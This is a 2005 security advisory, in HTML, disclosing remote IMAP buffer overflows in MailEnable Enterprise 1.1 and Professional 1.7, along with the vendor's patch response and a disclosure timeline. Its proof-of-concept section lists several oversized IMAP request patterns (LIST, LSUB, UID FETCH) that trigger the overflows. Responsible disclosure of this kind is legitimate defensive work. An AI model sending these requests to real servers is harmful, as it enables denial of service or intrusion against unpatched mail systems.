<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-27-0x2] Remote Overflows in Mailenable Enterprise 1.1 / Professional 1.7</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<BR>
<P><FONT SIZE=2>Re: See-Security Research and Development</FONT>
<BR><FONT SIZE=2>"A remote buffer overflow exists in MailEnable Enterprise 1.1 IMAP EXAMINE command, which allows for post authentication code execution. This vulnerability affects Mailenable Enterprise 1.1 *without* the ME-10009.EXE patch."</FONT></P>
<P><FONT SIZE=2>-- There's a reason why the ME-10009 patch was released. You're welcome!</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - Buffer Overflow</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-27 - 0x2</FONT>
</P>
<P><FONT SIZE=2>Class: Buffer Overflow</FONT>
<BR><FONT SIZE=2>Package: MailEnable Enterprise Edition version 1.1 </FONT>
<BR> <FONT SIZE=2> MailEnable Professional version 1.7 </FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Reported: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 21, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: Medium</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton <security-advisories@acs-inc.com></FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>MailEnable's mail server software provides a powerful, scalable </FONT>
<BR><FONT SIZE=2>hosted messaging platform for Microsoft Windows. MailEnable </FONT>
<BR><FONT SIZE=2>offers stability, unsurpassed flexibility and an extensive </FONT>
<BR><FONT SIZE=2>feature set which allows you to provide cost-effective mail </FONT>
<BR><FONT SIZE=2>services.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>Multiple vulnerabilities has been identified in MailEnable, </FONT>
<BR><FONT SIZE=2>which may be exploited by remote attackers to cause a denial </FONT>
<BR><FONT SIZE=2>of service, or could lead to remote execution of code. This </FONT>
<BR><FONT SIZE=2>issue is due to an error in the IMAP service that does not </FONT>
<BR><FONT SIZE=2>properly handle specially crafted requests.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Proof of Concepts</FONT>
</P>
<P><FONT SIZE=2>IMAP REQUEST: '02 LIST /.:/' + Ax5000 </FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 LSUB' /.:/ ('A' x 5000) request</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH /.:/' AX5000 ' FLAGS'</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH /...'x5 ' FLAGS'</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH '/\'x5000 '</FONT>
</P>
<P><FONT SIZE=2>Several others exist and all have been reported to the vendor.</FONT>
</P>
<P><FONT SIZE=2>-=[ Solution</FONT>
</P>
<P><FONT SIZE=2>According to Peter Fregon of MailEnable Pty. Ltd, these advisories have been patched in the latest ME-10009 Patch. Any further questions should be directed towards the vendor.</FONT></P>
<P><FONT SIZE=2><A HREF="http://www.mailenable.com/hotfix/default.asp" TARGET="_blank">http://www.mailenable.com/hotfix/default.asp</A></FONT>
</P>
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerability originally reported by Tim Shelton</FONT>
</P>
<P><FONT SIZE=2>-=[ Similar References</FONT>
</P>
<P><FONT SIZE=2><A HREF="http://www.frsirt.com/english/advisories/2005/2579" TARGET="_blank">http://www.frsirt.com/english/advisories/2005/2579</A></FONT>
<BR><FONT SIZE=2><A HREF="http://www.frsirt.com/english/advisories/2005/2484" TARGET="_blank">http://www.frsirt.com/english/advisories/2005/2484</A></FONT>
</P>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-27 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-03 : Vendor Response</FONT>
<BR><FONT SIZE=2>2005-12-21 : Full Disclosure</FONT>
</P>
<BR>
<BR>
<BR>
<P><FONT SIZE=2>-=[ Vendor Response</FONT>
<BR><FONT SIZE=2>-----------------------------------------------------------------</FONT>
<BR><FONT SIZE=2>Sat 12/3/2005 1:41 AM</FONT>
</P>
<P><FONT SIZE=2>Hi,</FONT>
<BR><FONT SIZE=2>Thanks for the information. We have posted a hotfix for this at the following URL:</FONT>
<BR><FONT SIZE=2><A HREF="http://www.mailenable.com/hotfix" TARGET="_blank">http://www.mailenable.com/hotfix</A></FONT>
<BR><FONT SIZE=2>We will also be updating our installation kits with this hotfix shortly.</FONT>
<BR><FONT SIZE=2> </FONT>
<BR><FONT SIZE=2>Thanks</FONT>
<BR><FONT SIZE=2>Peter Fregon</FONT>
<BR><FONT SIZE=2>MailEnable Pty. Ltd.</FONT>
<BR><FONT SIZE=2> </FONT>
<BR><FONT SIZE=2>------</FONT>
<BR><FONT SIZE=2>Friday, 2 December 2005 03:02</FONT>
<BR><FONT SIZE=2>All - </FONT>
<BR><FONT SIZE=2>Below is an internal advisory notification for MailEnable Enterprise Edition version 1.1 and possibly others. Attached is our Ethical Disclosure Policy. If you have any further questions, please do not hesitate to contact us.</FONT></P>
<P><FONT SIZE=2>Thanks, </FONT>
<BR><FONT SIZE=2>Tim Shelton </FONT>
<BR><FONT SIZE=2>ACS Security Assessment Engineering </FONT>
</P>
</BODY>
</HTML>